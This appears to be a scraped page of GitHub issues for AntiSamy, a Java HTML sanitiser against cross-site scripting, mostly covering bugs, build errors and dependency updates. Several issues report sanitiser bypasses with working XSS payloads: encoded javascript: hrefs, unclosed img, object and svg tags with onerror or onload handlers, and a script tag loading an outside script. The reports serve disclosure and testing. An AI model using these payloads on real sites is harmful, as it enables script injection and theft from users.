nahsra / antisamy Goto Github PK

a library for performing fast, configurable cleansing of HTML coming from untrusted sources

License: BSD 3-Clause "New" or "Revised" License

Java 19.29% JavaScript 7.17% HTML 29.51% CSS 6.05% DIGITAL Command Language 33.00% Shell 4.42% Roff 0.56% Hack 0.01% ASP.NET 0.01%

html javascript xss-filter java-library security-tools

antisamy's Issues

Antisamy changing the URL begnin pattern.

Been using Antisamy for one of my projects, after I inputting the URL something like this

https://www.google.com/terms-conditions/vacancy.html and click on save button the same URL mention above will change something to this https://www.google.com/ter-ms-conditions/vacancy.html.

terms- is been change to ter-ms-. Please give the solution.

!important CSS rule is removed

We started to use AntiSamy for CSS validation in our WEB project and realized that it removes !important CSS rules from the styles.

Eg. <p style=\"color: red !important\">Some Text</p> resolves to <p style=\"color: red\">Some Text</p>

The following test added to AntiSamyTest fails.

    @Test
    public void givenImportantRuleWhenScanThenPreserved() throws ScanException, PolicyException {
        String s = as.scan("<p style=\"color: red !important\">Some Text</p>", policy, AntiSamy.DOM).getCleanHTML();
        assertTrue(s.contains("!important"));

        s = as.scan("<p style=\"color: red !important\">Some Text</p>", policy, AntiSamy.SAX).getCleanHTML();
        assertTrue(s.contains("!important"));
    }

I see it from the method parameters of org.owasp.validator.css.CssHandler#property that we are aware of the fact if a property is important or not but it looks like the code ignores this information as the argument is not used anywhere.

...
public void property(String name, LexicalUnit value, boolean important)
			throws CSSException {
		// only bother validating and building if we are either inline or within
		// a selector tag

		if (!selectorOpen && !isInline) {
...

Is there a way to get it working or am I missing something? Let me know if you need further information!

Thank you in advance!

ArrayIndexOutOfBoundsException

I get.

javax.xml.transform.TransformerException: java.lang.ArrayIndexOutOfBoundsException: -1
org.owasp.validator.html.ScanException: javax.xml.transform.TransformerException: java.lang.ArrayIndexOutOfBoundsException: -1
	at org.owasp.validator.html.scan.AntiSamySAXScanner.scan(AntiSamySAXScanner.java:135) ~[antisamy-1.5.7.jar:1.5.7]
	at org.owasp.validator.html.AntiSamy.scan(AntiSamy.java:101) ~[antisamy-1.5.7.jar:1.5.7]

When

antiSamy.scan ( "my &test",  antisamypolicy, AntiSamy.SAX ).getCleanHTML (); //used the standard antisamy.xml

onUnknownTag directive causes AntiSamy.scan to lose closing tag

See attached java test class that shows the problem.
Given a Policy that accepts no html, but has <directive onUnknownTag="encode"/>, calling

    AntiSamy.scan("<div>abc</div>", policy);

produces the string <div>abc (without the trailing </div>)
Is this a bug?

package org.yourname;

import static org.hamcrest.CoreMatchers.equalTo;
import static org.junit.Assert.assertThat;

import java.io.InputStream;
import java.io.StringBufferInputStream;

import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.runners.MockitoJUnitRunner;
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;


@SuppressWarnings("deprecation")
@RunWith(MockitoJUnitRunner.class)
public class AntiSamyEncodingTest 
{
    @Test
    /**
     * Demonstrates that the onUnknownTag directive causes AntiSamy's scan to
     * lose the closing tag
     * 
     * Given an input like 
     * <pre>
     *   <div>hello, world</div>
     * </pre>
     * scan will return 
     * <pre>
     *   &ltdiv&gt;hello, world
     * </pre>
     * without the closing tag.
     */
    public void standaloneTest() throws PolicyException, ScanException 
    {
        String policyDefinition = 
            "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>" +
            "<anti-samy-rules xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" " +
            "                       xsi:noNamespaceSchemaLocation=\"antisamy.xsd\">" +
            "    <directives>" +
            "        <directive name=\"onUnknownTag\" value=\"encode\" />" +
            "     </directives>" +

            "    <common-regexps></common-regexps>" +

            "    <common-attributes></common-attributes>" +
            "    <!-- no tags are valid, by default all html elements are encoded -->" +
            "    <tag-rules></tag-rules>" +
            "</anti-samy-rules>";
                
        InputStream sr = new StringBufferInputStream(policyDefinition);
        AntiSamy as = new AntiSamy();
        Policy policy = Policy.getInstance(sr);
        String taintedHtml = "<div>hello, world</div>";
        CleanResults cr = as.scan(taintedHtml, policy, AntiSamy.SAX);
        String cleaned = cr.getCleanHTML();
        
        // the value is "&lt;div&gt;hello, world", missing the closing element
        assertThat(cleaned, equalTo("&lt;div&gt;hello, world&lt/div&gt;")); //fails
    }
}

If and only if you agree this is not correct, would be happy to open a PR

antisamy ignoring anything rule?

i have a rule for an attribute in a tag that is like this:
<tag name="tag1" action="validate" > <attribute name="attribute1"> <regexp-list> <regexp name="anything" /> </regexp-list> </attribute> <attribute name="attribute2" /> </tag>

when i use the SAX parser, attribute1 is dropped because it has an LSEP character in it. it also may be dropping the filename for other characters. either way, shouldn't attribute1 not be dropped since the regexp has been assigned as anything?

the specific error message i'm getting is "The tag1 tag contained an attribute that we could not process. The attribute1 attribute had a value of "Gartner - Executive Guide to Total Experience .pdf". This value could not be accepted for security reasons. We have chosen to remove this attribute from the tag and leave everything else in place so that we could process the input."

Failed to execute goal org.apache.maven.plugins:maven-javadoc-plugin:3.0.1:jar (attach-javadocs)

Hi,

I just tried to build antisamy on a windows box. I called mvn package and got the following messages.

[ERROR] Failed to execute goal org.apache.maven.plugins:maven-javadoc-plugin:3.0.1:jar (attach-javadocs) on project antisamy: MavenReportException: Error while generating Javadoc:
[ERROR] Exit code: 1 - D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:123: warning: no @param for errorMessages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:123: warning: no @param for messages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:139: warning: no @param for errorMessages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:139: warning: no @param for messages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,

There is no schema validation for policy XML

AntiSamy seems to lack of a schema validation when loading the XML of a policy.

This may lead to malformed policies that are valid (AntiSamy won't blow up) but do not comply with the XSD. Bugs can originate from bad policy definition, which could be prevented with XML schema validation.

Even if applying validation to current example policies (and some customized in tests), they fail to validate.

This is a screenshot to the validation on freeformatter for antisamy-tinymce.xml:

I would suggest applying strict schema validation with the already defined XSD. As an improvement, if requested or considered useful, multiple or "stacked" validation could be applied, seen as an intersection of schemas to restrict policies structure even more.

Add rel="noopener" to anchor if target="_blank" is set => security enhancement

Add rel="noopener" to anker if target="_blank" is set
Based on the OWASP article
https://owasp.org/www-community/attacks/Reverse_Tabnabbing
it would be nice if the noopener attribute would be set automatically if the target blank attribute is in use.

This is very similar to the nofollow setting in antisamy

Example
<a href="https://example.com" target="_blank"> => <a href="https://example.com" target="_blank" rel="noopener">

<a/href=javascript:[1].find(alert)>CLICKHERE</a> does not return error

The policy of tag a is below. The clean HTML removed the /href attribute without any error, could you help to have a look at it? How to return an error message for this case?

rev="1.6.3"

Thanks in advance!

         <tag name="a" action="validate">

            <!--  onInvalid="filterTag" has been removed as per suggestion at OWASP SJ 2007 - just "name" is valid -->
            <attribute name="href"/>
            <attribute name="onFocus"/>
            <attribute name="onBlur"/>
            <attribute name="nohref">
                <regexp-list>
                    <regexp name="anything"/>
                </regexp-list>
            </attribute>
            <attribute name="rel">
                <literal-list>
                    <literal value="nofollow"/>
                </literal-list>
            </attribute>
            <attribute name="name"/>


            <attribute name="target">
                <regexp-list>
                    <regexp value="[a-zA-Z0-9\-_\$]+"/>
                </regexp-list>
            </attribute>

        </tag>

Antisamy truncates whole content when frame tag is used in the input and configured frame tag to be removed.

When using antisamy with the attached file where the following tag rule is defined

and providing the input remove

should not be removed

giving the output as empty string instead of

should not be removed

sample code below:

Policy policy = Policy.getInstance("C:\\antisamy-basic.xml");
AntiSamy antisamy = new AntiSamy(policy);
CleanResults cleanResults = antisamy.scan("<frame>remove</frame><div>should not be removed</div>");
System.out.println(cleanResults.getCleanHTML());

We are using antisamy version 1.5.5
antisamy-basic.zip

Antisamy Removes carriage returns and line feeds

andresriancho/owaspantisamy#143

remove httpclient-3.1

Upstream and users want this library out due to known CVE. It's not a realistic threat for AntiSamy use for a couple reasons, but it's harmless to pull it out and replace with the latest.

AntiSamy 1.6.4 doesn't play nicely with xalan-j 2.7.2

This code was added in org.owasp.validator.html.scan.AntiSamySAXScanner:

sTransformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
sTransformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");

Xerces2-j does not support these attribute constants. The Oracle JAXP documentation (https://docs.oracle.com/javase/tutorial/jaxp/properties/usingProps.html) says that it is recommended to catch the IllegalArgumentException for unsupported features.

I know that Xerces is ancient, but there isn't any need to break compatibility in this way.

UPDATE: This issue was originally created with Xerces-2 in the title as the offending library. So the thread below talks about Xerces alot. But the actual problem is with a variant of Xalan in the classpath and Xerces is a red herring. Way below, Xalan is finally mentioned as the real problem, not Xerces.

Usage of vulnerable commons-httpclient library

Hi,

This library has a dependency on the commons-httpclient library which is both end of life and vulnerable. Is it possible to upgrade to its replacement, http://hc.apache.org/httpcomponents-client-ga/index.html?

Thanks,
Geert

Injecting js in "a" tag

Still able to inject <a onmouseover=alert(1)>click</a>, <p onmouseover=alert(1)>click</p> element. Even though I have updated the antisamy policy to remove "a" tag completely

AntiSamy is not work on <svg/onload = alert('Hello')/>

I am working on 1 of XSS issue where our tester finds an issue like <svg/onload = alert('Hello') > and antisamy is not cleaning this particular tag.

even I debug antisamy library that it will consider or <style> as a tag and continue with current code so it is not throwing any particular exception.

i have already written small test case for your reference

@Test public void testStyleOnloadWithAlertScripts() throws PolicyException, ScanException { assertEquals( "", scanner.scan("<style/onload = alert(document.domain)>")); }

can anyone look into it to resolving this issue either from XML Configuration or from new patch release

... i think i found a way to bypass ....

if you are trying

&#x22;&#x3E;&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x61;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3E;

and put it in as parameter
antiSamy.scan ( parameter, policy, AntiSamy.SAX ).getCleanHTML ();

you will get ><img src=a onerror=alert(1)> and so an alert popping up.... even if img Tags are set to remove.

AntiSamy should not be dependent on Xerces

Xerces does not support the attributes on a Transformer that are required in order to mitigate XXE vulnerabilities. While this may not be a huge issue for AntiSamy itself, the fact that we have to include xercesImpl.jar in our application classpath means that xerces is used ahead of the JDK, and therefore our XXE mitigations are useless.

XXE mitigation reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#TransformerFactory

Besides all of that: Xerces hasn't been maintained since 2010!

As has been mentioned by others: AntiSamy should be using XLST to serialize instead of the deprecated HTMLSerializer. As far as I can tell, this is the only direct xerces dependency.

Thanks.

when preserveComments directive is enabled, the HTML comments are moved to the end

Added:

into the config

I used this input:

<p>this is a test content before start testing</p>
<!-- TESTING COMMENT --><p>another line</p>
<p>end of the content</p>

then after

Policy policy = Policy.getInstance(App.class.getResourceAsStream("/antisamyConfig.xml"));
AntiSamy sanitizer = new AntiSamy(policy); 
CleanResults scanned = sanitizer.scan(input);
String sanitized = scanned.getCleanHTML();

The output was:

<p>this is a test content before start testing</p>
<p>another line</p>
<p>end of the content</p>
<!-- TESTING COMMENT -->

Batik-css-1.8 has high severity vulnerability

Hello,

Using antisamy causes batik-css-1.8.jar to be include as a run-time dependency. There is a high severity CVE against this library: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5662.

batik-1.9 was recently release which fixes this issue. Any chance we could get a new version of antisamy with this instead of 1.8? I could do a pull request if you like.

Thanks!

NullPointerException for input string "|<?ai aaa"

The code in question gets invoked through ESAPI library so I'm not sure if it has a bearing. But on examination of the method removePI of class AntiSamyDOMScanner, it looks like the node doesn't have any parent node. And so node.getParentNode() creates a null pointer exception. Attaching the stack trace here.

java.lang.NullPointerException
at org.owasp.validator.html.scan.AntiSamyDOMScanner.removePI(AntiSamyDOMScanner.java:689)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.recursiveValidateTag(AntiSamyDOMScanner.java:260)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.processChildren(AntiSamyDOMScanner.java:675)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.processChildren(AntiSamyDOMScanner.java:666)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.scan(AntiSamyDOMScanner.java:159)
at org.owasp.validator.html.AntiSamy.scan(AntiSamy.java:93)

Performance got degraded after upgrade from 1.5.7 version to 1.5.8 for the SAXScanner.

After upgrading antisamy jar version from 1.5.7 to 1.5.8 performance got down by 40-50%.
After comparing the 1.5.8 version of code with the 1.5.7. I found that in case of SAXScanner, in the class AntiSamySAXScanner after doing all the scanning process the cached item is not being added to the cachedItems Queue, because of which for every scan call object of CachedItem class is being created.
And this create operation for every scan is lowering down the performance.

stripNonValidXMLCharacters doesn't work with HTML where html.length() > 1

It looks like somewhere around version 1.5 that the method org.owasp.validator.html.scan.AntiSamyDOMScanner#stripNonValidXMLCharacters was altered to check if the Pattern for invalidXmlCharacters java.util.regex.Matcher#matches() .
I presume that was in a bid for efficiency to cut down on a replaceAll method call if there was no need to affect the String input.
You use the same technique in a test to check if there are time improvements made.

I believe it should use java.util.regex.Matcher#find() instead.

matches() checks if the entire sequence matches the pattern. Since the pattern represents only a single character, in effect, that can be in one of the defined sets, then if the sequence (the HTML) is longer than 1 character it can never match. It's been this way since forever I believe, at least Java 5.

find() will find the next subsequence that matches the pattern, in effect checking quickly and succeeding fast if the HTML needs to be cleansed.

You're getting a speed increase because matches() is getting to the second char and declaring the sequence as a non-match regardless.

Input HTML:
<div>Hello\uD83D\uDC95</div>

Expected on org.owasp.validator.html.CleanResults#getCleanHTML :
<div>Hello</div>

Actual:
<div>Hello\uD83D\uDC95</div>

Where input HTML is single character \uD888 only then the output is the empty string as expected.

I looked through the test class here and can see no tests where you are expecting data to be cleansed. All the tests ensure that characters make it through ok or that something is faster (checking only 1 char is faster!)

Incidentally, I only noticed this since the Antisamy code looked to want to cleanse the characters needed for an emoji, where the character is actually valid in XML and HTML spec so far as I can tell, when their UTF-8 bytes are read by our system we get a Java representation in 16 bit char underpinning the String and the character points fall within your filter and, although I don't believe you should be stripping those if they come together and according to java.lang.Character#isSurrogatePair the two \uD83D \uDC95 together return true rather than false and the toCodePoint method tells us that it's &#128149 . So I think the checks in this method ought to be more complex.
Ironically, if the code in this method worked as intended then the characters would have been cleansed away. But they weren't.

I believe you could get manipulative code points through now, because of this. But I can't be certain as I'm looking purely from a data cleansing point of view.

test

Filter Bypasses

The markup below shows multiple ways to bypass the AntiSamy filter.

The list under the NOT Sanitized by AntiSamy shows a couple Javascript payloads that browsers execute (tested with Chrome 69), but won't be removed by AntiSamy.
The list under the Sanitized by AntiSamy heading is sanitized correctly and just left here as a recommendation for tests.
The list under the Tricky Encoding with Ampersand Encoding was created by taking one of the payloads under NOT Sanitized by AntiSamy and encoding all encountered ampersands, using different ways to encode an ampersand. One could repeat this process for any payload under NOT Sanitized by AntiSamy.

<html>
  <head>
    <title>Test</title>
  </head>
  <body>
    <h1>Tricky Encoding</h1>
    <h2>NOT Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058x=alert,x%281%29">X&#00058;x</a></li>
      <li><a href="javascript&#00058y=alert,y%281%29">X&#00058;y</a></li>

      <li><a href="javascript&#58x=alert,x%281%29">X&#58;x</a></li>
      <li><a href="javascript&#58y=alert,y%281%29">X&#58;y</a></li>

      <li><a href="javascript&#x0003Ax=alert,x%281%29">X&#x0003A;x</a></li>
      <li><a href="javascript&#x0003Ay=alert,y%281%29">X&#x0003A;y</a></li>

      <li><a href="javascript&#x3Ax=alert,x%281%29">X&#x3A;x</a></li>
      <li><a href="javascript&#x3Ay=alert,y%281%29">X&#x3A;y</a></li>
    </ol>
    <h2>Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058;alert&lpar;1&rpar;">X&#00058;</a></li>
      <li><a href="javascript&#58;alert&lpar;1&rpar;">X&#58;</a></li>

      <li><a href="javascript&#x0003A;alert&lpar;1&rpar;">X&#x0003A;</a></li>
      <li><a href="javascript&#x3A;alert&lpar;1&rpar;">X&#x3A;</a></li>

      <li><a href="javascript&colon;alert&lpar;1&rpar;">X&colon;</a></li>
    </ol>

    <h1>Tricky Encoding with Ampersand Encoding</h1>
    <p>AntiSamy turns harmless payload into XSS by just decoding the encoded ampersands in the href attribute</a>
    <ol>
      <li><a href="javascript&amp;#x3Ax=alert,x%281%29">X&amp;#x3A;x</a></li>
      <li><a href="javascript&AMP;#x3Ax=alert,x%281%29">X&AMP;#x3A;x</a></li>

      <li><a href="javascript&#38;#x3Ax=alert,x%281%29">X&#38;#x3A;x</a></li>
      <li><a href="javascript&#00038;#x3Ax=alert,x%281%29">X&#00038;#x3A;x</a></li>

      <li><a href="javascript&#x26;#x3Ax=alert,x%281%29">X&#x26;#x3A;x</a></li>
      <li><a href="javascript&#x00026;#x3Ax=alert,x%281%29">X&#x00026;#x3A;x</a></li>
    </ol>
    <p><a href="javascript&#x3Ax=alert,x%281%29">Original without ampersand encoding</a></p>
  </body>
</html>

Test build failed in Java 7

Environment

windows jdk-7 maven 3.8.1 antisamy 1.6.4

Steps to reproduce

mvn test / mvn package

What is expected?

Success

What is actually happening?

......
[ERROR] Tests run: 14, Failures: 0, Error
s: 1, Skipped: 0, Time elapsed: 0.11 s <<< FAILURE! - in o
rg.owasp.validator.html.test.PolicyTest
[ERROR] org.owasp.validator.html.test.PolicyTest.testGithubIssue79  Ti
me elapsed: 0 s  <<< ERROR!
java.lang.UnsupportedClassVersionError: org/owasp/antisamy/test/Dummy : Unsuppor
ted major.minor version 52.0
        at org.owasp.validator.html.test.PolicyTest.testGithubIssue79(PolicyTest
.java:341)

[INFO] Results:
[INFO]
[ERROR] Errors:
[ERROR]   PolicyTest.testGithubIssue79:341 ? UnsupportedClassVe
rsion org/owasp/antisamy/...
[INFO]
[ERROR] Tests run: 93, Failures: 0, Errors: 1, Skipped: 0
[INFO]
[INFO] -----------------------------------------------------------
-------------
[INFO] BUILD FAILURE
[INFO] -----------------------------------------------------------
......

and

......
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.0.0-M3/maven-enforcer-plugin-3.0.0-M3.pom
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  0.939 s
[INFO] Finished at: 2021-08-04T10:35:20+08:00
[INFO] ------------------------------------------------------------------------
[ERROR] Plugin org.apache.maven.plugins:maven-enforcer-plugin:3.0.0-M3 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-enforcer-
plugin:jar:3.0.0-M3: Could not transfer artifact org.apache.maven.plugins:maven-enforcer-plugin:pom:3.0.0-M3 from/to central (https://repo.maven.apache.org/maven2): transfer failed for https://repo.maven.apache
.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.0.0-M3/maven-enforcer-plugin-3.0.0-M3.pom: Received fatal alert: protocol_version -> [Help 1]
......

Reason

1, The use case for TestGithubIssue79 requires jdk8.
2, Java7 defaults to TLSv1.0, but maven-enforcer-plugin-3.0.0-M3.pom has instructions to set it to TLSv1.2.
All of this means that the new version of Antisamy is no longer supporting Java 7, at least Java8, but I note that the readme document states that Antisamy 1.6.4 supports Java 7+.
As far as I know, JDK now has only two TLS versions, Java 8 and Java 11, and the other versions are no longer maintained.
Why does Antisamy still need to support Java 7?

Best Regards

incomplete tag removing rest of content

i have a problem, when there is a "<" symbol in content without ">" it will remove rest of content right side to it.
added directive: <directive name="onUnknownTag" value="encode"/>
input: "hello <hi world, it is clean"
output : "hello"
is there any way that i get the output same as input in this case.:
expected output: "hello <hi world, it is clean"

AntiSamy is not working for special case

Antisamy is not working for the test case , i tried in latest version also.
When there is "/" character inside tag it fails.

My Test Case:
@test
public void testXSSScript() throws PolicyException, ScanException {
String result = scanner.scan("<style/onload=alert(document.domain)>");
assertEquals("", result);
}

====Logic which called by test case===
Please consider policy is loading and i attached antisamy.xml , For some reason it is not giving any error for <style/onload=alert(document.domain)> when "Collection errors = r.getErrorMessages();" executes

public String scan(String untrustedUserInput) throws PolicyException, ScanException {
CleanResults r = webSecurityScanner.scan(untrustedUserInput, AntiSamy.SAX);
if(logger.isDebugEnabled()) {
logger.debug("Scanned request parameter in " + r.getScanTime() + "ms");
logger.debug("Value: " + untrustedUserInput);
logger.debug("Result: " + r.getCleanHTML());
logger.debug("Errors: " + r.getErrorMessages());
}

    Collection<String> errors = r.getErrorMessages();
    if(CollectionUtils.exists(errors, securityErrorPredicate)) {
        logger.info("Returning cleansed input due to " + errors.size() + " security errors: " + errors);
        logger.debug("Original: [" + untrustedUserInput + "]");

        final String cleansedHTML = fixMangledTags(r.getCleanHTML());
        logger.debug("Cleansed: [" + cleansedHTML + "]");
        return cleansedHTML;
    }
    return untrustedUserInput;
}

antisamy.zip

Policy schema does not match xml structure

The provided files "antisamy.xml" and antisamy.xsd" don't match.
The xml files contains <dynamic-tag-attributes>, but in the schema, there is no such tag included.

The lang subtags is cleaned

<p lang="en-GB">This paragraph is defined as British English.</p>
Output:
<p>This paragraph is defined as British English.</p>

Hi, @davewichers Is there a security problem here? Why not support IANA subtags?

Antisamy removes "margin" attribute when it's value is configured very small decimal number

Steps to reproduce the problem-

Create HTML content having tag with styling attribute <p style="margin: 0.0001pt;" /> .
Use filterHTML API to filter the above HTML content
In the response, the "margin" attribute is getting removed with warning log [1]

Expected output-
With regexp configuration [2], should not remove the margin with any decimal number

[1] AntiSamy warning: The p tag had a style attribute, "margin", that could not be allowed for security reasons.
[2] <regexp name="length" value="((-|\+)?0|(-|\+)?([0-9]+(\.[0-9]*)?)(em|ex|px|in|cm|mm|pt|pc))"/>

Support HTML5

AntiSamy uses a deprecated HTMLSerializer which does not understand newer HTML5 tags like <figure>. While this is a minor issue, it also does not understand newer HTML5 entities like &colon; or (. This leads to a security vulnerability where the following text does not get cleaned:

<a href="javascript&colon;alert&lpar;1&rpar;">X</a>

Filter Bypass

Antisamy fails to filter (identify) 'HTML / HTML5 elements with events (onerror, onload, etc) when the tags are not closed with ">" character.
Modern browsers (tested with Firefox and Chrome) will autocomplete such tags and hence will execute the JavaScript leading to Cross-site Scripting - XSS

Example Payloads for better understanding -

<img src=# onerror=alert(0)//K7-onerror_attribute
<img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAMSURBVBhXY/j//z8ABf4C/qc1gYQAAAAASUVORK5CYII= onload=alert(0)//K7-onload_attribute
<input type="image" src=# onerror=alert(0)//K7-works_for_other_html_n_html5_tags
<object data=# onerror=alert(0)//K7-FireFox_specific
<object data=# onload=alert(0)//K7-Chrome_specific
<script onerror=alert(0) onload=alert(1) src=http://xss.rocks/xss.js#K7-script_tag_works_under_specific_conditions
<svg onload=alert(0)//K7-SVG_special_char_variant

I have tested using both - SAX and DOM, found the payloads to execute.

Karan Ramani

Antisamy Stripping nested lists and tables

If I input the following html:

<ul>
    <li> one </li>
    <li> two</li>
    <li> three 
          <ul>
             <li>a</li>
             <li>b</li>
          </ul>
    </li>
</ul>

The following output occurs:

<ul>
    <li> one </li>
    <li> two</li>
    <li> three 
          <ul>
          </ul>
    </li>
    <li>a</li>
    <li>b</li>
</ul>

Basically it moves the nested list content to the parent list. This seems to be a bug since I can't find any configuration to fix this.

AntiSamy Bypass - looking for security contact

I'm reasonably sure that I found a bypass leading to XSS. Can I please get a contact to further discuss this issue?

Antisamy 1.6 introduces log4j dependency

When updating one of my modules to Antisamy 1.6 I got a test failure due to org.owasp.validator.html.Policy now having a hard dependency on log4j, whereas the pom.xml declares that it's using slf4j.

https://github.com/nahsra/antisamy/blob/master/src/main/java/org/owasp/validator/html/Policy.java#L83

It appears this was introduced in the commit:

64416f1#diff-ea20191cc92e7360f2cc25757c0fd872902416e123220b6649b0dc7a0af5663b

It seems this is the ONLY logging in the project, the logging depdency doesn't appear to be mentioned in the release ntoes on https://github.com/nahsra/antisamy/releases/tag/v1.6.0 either.

Since slf4j is mentioned - should this not be using slf4js API only, with the slf4j-over-log4j be used in tests, or client applications ONLY.

IOException on Policy creation from InputStream when schema validation is disabled

Antisamy version: 1.6.1

Problem

Unable to generate a Policy instance from Policy.newInstance(InputStream) when antisamy schema validation is disabled and the configuration file contains an invalid structure.

antisamy_tests.tar.gz

Results :

Tests in error: 
  testSystemProp(antisamy_tests.InvalidPolicyTest): java.io.IOException: Stream closed
  testDirectConfig(antisamy_tests.InvalidPolicyTest): java.io.IOException: Stream closed

Tests run: 2, Failures: 0, Errors: 2, Skipped: 0

mvnCleanTest.txt
mvnCleanTest_verbose.txt

Initial Assessment

Pertinent Stacktrace from logs:

org.owasp.validator.html.PolicyException: java.io.IOException: Stream closed
	at org.owasp.validator.html.Policy.getTopLevelElement(Policy.java:379)
	at org.owasp.validator.html.Policy.getTopLevelElement(Policy.java:355)
	at org.owasp.validator.html.Policy.getInstance(Policy.java:235)

Snippet from Policy.java

protected static Element getTopLevelElement(InputSource source, Callable<InputSource> getResetSource) throws PolicyException {
        // Track whether an exception was ever thrown while processing policy file
        Exception thrownException = null;
        try {
>> First Stream use ::             return getDocumentElementFromSource(source, true);
        } catch (SAXException e) {
            thrownException = e;
            if (!validateSchema) {
                try {
                    source = getResetSource.call();
    >> Second Stream use ::                   Element theElement = getDocumentElementFromSource(source, false);
                    // We warn when the policy has an invalid schema, but schema validation is disabled.
                    logger.warn("Invalid policy file: " + e.getMessage());
                    return theElement;
                } catch (Exception e2) {
                    throw new PolicyException(e2);
                }
            } else throw new PolicyException(e);
        } catch (ParserConfigurationException | IOException e) {
            thrownException = e;
    >> EXCEPTION ::           throw new PolicyException(e);
        } finally {
            if (!validateSchema && (thrownException == null)) {
                // We warn when the policy has a valid schema, but schema validation is disabled.
                logger.warn("XML schema validation is disabled for a valid policy. Please reenable policy validation.");
            }
        }
    }

I think that the first stream use completes the read process (I've followed that through all the way to the return clause from getDocumentElementFromSource), and then closes the stream. Then it fails to parse the response in the return and falls into the SAXException Block. The property set lets us try again, but the source object was never reset from the last event, and so we cannot read from the closed stream. I can't see the actual stream in my debugger so I can't be 100% certain, but this workflow would appear to match the current output from the tests.

AntiSamy rules not getting applied to attributes if an attribute does not have a value

In a web project we use ESAPI validator to sanitize inputs. While most of the improper inputs are detected as expected, it fails to detect the below given input as improper. I am using esapi-2.1.0.1 and antisamy-1.5.3 jars.

<img src=x onerror=alert(1) alt=

Potentially, the browser closes the tag itself, hence triggering the alert function. Surprisingly, ESAPI detects the below given input as improper:

<img src=x onerror=alert(1) alt="text"

Below are some test cases and analysis done :
Regex used for alt attribute : [a-zA-Z0-9:-_.]+ (It needs minimum one character)
Regex used for onerror attribute : [0-9\s*,]* (It allows numbers and whitespace characters)

Input: <img src=x alt="" || Observation: Tag is filtered || Status: Passed
Input: <img src=x alt= || Observation: Tag not filtered || Status: Failed
Input: <img src=x onerror=alert(1) alt="" || Observation: Tag is filtered (due to regex condition for onerror) || Status: Passed
Input: <img src=x onerror=alert(1) alt= || Observation: Tag not filtered || Status: Failed

Observation:
Value of alt attribute is modifying the behavior of attribute validation (for itself in cases 1 & 2 and other tags in cases 3 & 4).

Questions:

For case 4. isn't the regex for onerror still supposed to validate the onerror attribute? Has it got something to do with alt attribute value?
What are the probable reasons where the value of alt attribute could alter the behavior of other attributes?

Can anyone please guide me with any suggestions or comments to mitigate the issue if I am going wrong somewhere ?

Thanks.

german translations of validation errors are partially written in bad german

The validation message
"Der h3 Tag leer war, und daher konnten wir nicht verarbeiten. Der Rest der Nachricht intakt ist, und ihre Entfernung sollte keine Nebenwirkungen."
is not correct german.

This should be fixed in /scr/main/resources/AntiSamy_de_DE.properties

Style validation in attributes isn't properly handled

This was given CVE-2016-10006, and was reported by Vivek Krishna, Zoho Corporation.

License

Please add a license file to your project

Update batik-css to 1.14

This would address a vulnerability in a downstream dependency
https://app.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1079038

Antisamy stripping @ and not encoding if it falls within <>

I am using antisamy 1.5.7.

I saw issue when input was

firstname,lastname<[email protected]> or firstname,lastname<[email protected] testing>

Result after Antisamy scan is same for both above cases

firstname,lastname<name>

I have below directive in policy file

<directive name="onUnknownTag" value="encode"/>

Is there a place in policy file I can update to encode @ when it is within <> ?

Multiple definition of tags on every policy file

On every policy XML file, I've found that the tag "col" is defined twice.

The first appearance is:

<tag name="col" action="validate"/>

And the second is:

<tag name="col" action="validate">
    <attribute name="align" />
    ...
    <attribute name="width" />
</tag>

Same thing happens with the property "clip", but this one is and exact copy.

This is not a real issue in Java, as the tests would fail when parsing the policy if it was. However, when implementing this on .NET for example, it may fail if you consider it appears once.

My proposal is to first verify if it is there on purpose. If it isn't, remove it. In my opinion, it makes no sense to have multiple definitions for anything here, it is just confusing for anyone who doesn't know about it as in Java this doesn't fail.

If it is OK to remove the duplicated tags, I can remove them and make the pull request (of course, tests don't fail when removing the tags from the default policy).

the default onsiteURL regex is not safe, if the url starts with '//', the url can jump out of the origin domain

the default onsiteURL regex:
